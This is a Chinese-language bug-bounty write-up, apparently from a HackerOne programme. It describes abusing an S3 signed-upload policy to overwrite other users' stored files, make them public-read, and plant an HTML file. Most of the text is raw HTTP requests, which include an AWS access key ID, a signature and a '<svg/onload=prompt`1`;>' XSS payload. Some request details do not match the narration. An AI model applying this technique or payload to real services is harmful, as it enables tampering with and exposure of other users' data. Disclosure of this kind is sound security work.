滥用 ACL 权限覆盖其他用户 S3 存储桶中的文件 / 视频

2025-10-10
福建
本文字数：3384 字
阅读完需：约 11 分钟

滥用 ACL 权限覆盖其他用户上传的文件/视频

大家好，今天我要写一篇关于在 HackerOne 某个项目中最新发现的博客。当时我正在寻找应用程序中的 IDOR 漏洞，于是开始对应用程序的每个请求进行模糊测试，我发现了以下请求：

POST /api-2.0/s3-upload-signatures HTTP/1.1Host: www.example.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://www.example.com/home/xxx/test/uploadX-Requested-With: XMLHttpRequest, XMLHttpRequestCache-Control: no-cacheContent-Type: application/json; charset=utf-8Authorization: Bearer :X-Example-Authorization: Bearer Content-Length: 311Connection: closeCookie: {}
{"expiration":"2018-12-18T11:58:24.376Z","conditions":[{"acl":"private"},{"bucket":"example-web-upload-bucket"},{"Content-Type":""},{"success_action_status":"200"},{"key":"a4fe6f57-a208-43a8-8aab-be2ac6ad06f9.jpg"},{"x-amz-meta-qqfilename":"1.jpg"},["content-length-range","1","9007199254740992"]]}

复制代码

基本上，这个请求用于设置上传文件到 S3 存储桶的策略，在这个请求之后，我得到了下面提到的照片/视频上传请求：

POST / HTTP/1.1Host: example-web-upload-bucket.s3.amazonaws.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://www.example.com/Content-Type: multipart/form-data; boundary=---------------------------1268156844136880633597812894Content-Length: 1716Origin: https://www.example.comConnection: close
-----------------------1268156844136880633597812894Content-Disposition: form-data; name="key"
a4fe6f57-a208-43a8-8aab-be2ac6ad06f9.jpg-----------------------1268156844136880633597812894Content-Disposition: form-data; name="AWSAccessKeyId"
AKIAIOTLFW3HMG563JEA-----------------------1268156844136880633597812894Content-Disposition: form-data; name="Content-Type"
text/html-----------------------1268156844136880633597812894Content-Disposition: form-data; name="success_action_status"
200-----------------------1268156844136880633597812894Content-Disposition: form-data; name="acl"
public-read-----------------------1268156844136880633597812894Content-Disposition: form-data; name="x-amz-meta-qqfilename"
1.jpg-----------------------1268156844136880633597812894Content-Disposition: form-data; name="policy"
xxxxxxxxxxxxx{this is policy} -----------------------1268156844136880633597812894Content-Disposition: form-data; name="signature"
n7QQDjsmZUL5fQMOXO0vvAF98kg=-----------------------1268156844136880633597812894Content-Disposition: form-data; name="file"; filename="1.jpg"Content-Type:-----------------------1268156844136880633597812894--

复制代码

这个请求使用了第一个请求中生成的文件上传策略。我尝试查找应用程序当前使用的 S3 存储桶中存在的其他文件，一旦我知道了同一存储桶中的一些照片/视频名称，我就尝试创建一个自定义策略来上传不受限制的文件到存储桶，这将覆盖现有文件，而且 ACL 权限是私有的，我想用 public-read 替换它，这样应用程序中的每个用户都会受到此攻击的影响。

我尝试通过更改请求中的以下值来创建自定义策略：

POST / HTTP/1.1Host: example-web-upload-bucket.s3.amazonaws.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://www.example.com/Content-Type: multipart/form-data; boundary=---------------------------1268156844136880633597812894Content-Length: 1716Origin: https://www.example.comConnection: close
-----------------------1268156844136880633597812894Content-Disposition: form-data; name="key"
a4fe6f57-a208-43a8-8aab-be2ac6ad06f9.jpg-----------------------1268156844136880633597812894Content-Disposition: form-data; name="AWSAccessKeyId"
AKIAIOTLFW3HMG563JEA-----------------------1268156844136880633597812894Content-Disposition: form-data; name="Content-Type"
-----------------------1268156844136880633597812894Content-Disposition: form-data; name="success_action_status"
200-----------------------1268156844136880633597812894Content-Disposition: form-data; name="acl"
private-----------------------1268156844136880633597812894Content-Disposition: form-data; name="x-amz-meta-qqfilename"
1.jpg-----------------------1268156844136880633597812894Content-Disposition: form-data; name="policy"
xxxxxxxxxxxxx{this is policy}-----------------------1268156844136880633597812894Content-Disposition: form-data; name="signature"
n7QQDjsmZUL5fQMOXO0vvAF98kg=-----------------------1268156844136880633597812894Content-Disposition: form-data; name="file"; filename="1.jpg"Content-Type:-----------------------1268156844136880633597812894--

复制代码

如截图所示，它创建了自定义策略来上传 HTML 文件，这将覆盖服务器上的现有文件。

我使用策略进行了文件上传请求，请求如下所示：

POST / HTTP/1.1Host: example-web-upload-bucket.s3.amazonaws.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://www.example.com/Content-Type: multipart/form-data; boundary=---------------------------1268156844136880633597812894Content-Length: 1716Origin: https://www.example.comConnection: close
-----------------------1268156844136880633597812894Content-Disposition: form-data; name="key"
a4fe6f57-a208-43a8-8aab-be2ac6ad06f9.jpg-----------------------1268156844136880633597812894Content-Disposition: form-data; name="AWSAccessKeyId"
AKIAIOTLFW3HMG563JEA-----------------------1268156844136880633597812894Content-Disposition: form-data; name="Content-Type"
text/html-----------------------1268156844136880633597812894Content-Disposition: form-data; name="success_action_status"
200-----------------------1268156844136880633597812894Content-Disposition: form-data; name="acl"
public-read-----------------------1268156844136880633597812894Content-Disposition: form-data; name="x-amz-meta-qqfilename"
1.html-----------------------1268156844136880633597812894Content-Disposition: form-data; name="policy"
xxxxxxxxxxxxx{this is policy}-----------------------1268156844136880633597812894Content-Disposition: form-data; name="signature"
n7QQDjsmZUL5fQMOXO0vvAF98kg=-----------------------1268156844136880633597812894Content-Disposition: form-data; name="file"; filename="1.html"Content-Type: text/html
<svg/onload=prompt`1`;>-----------------------1268156844136880633597812894--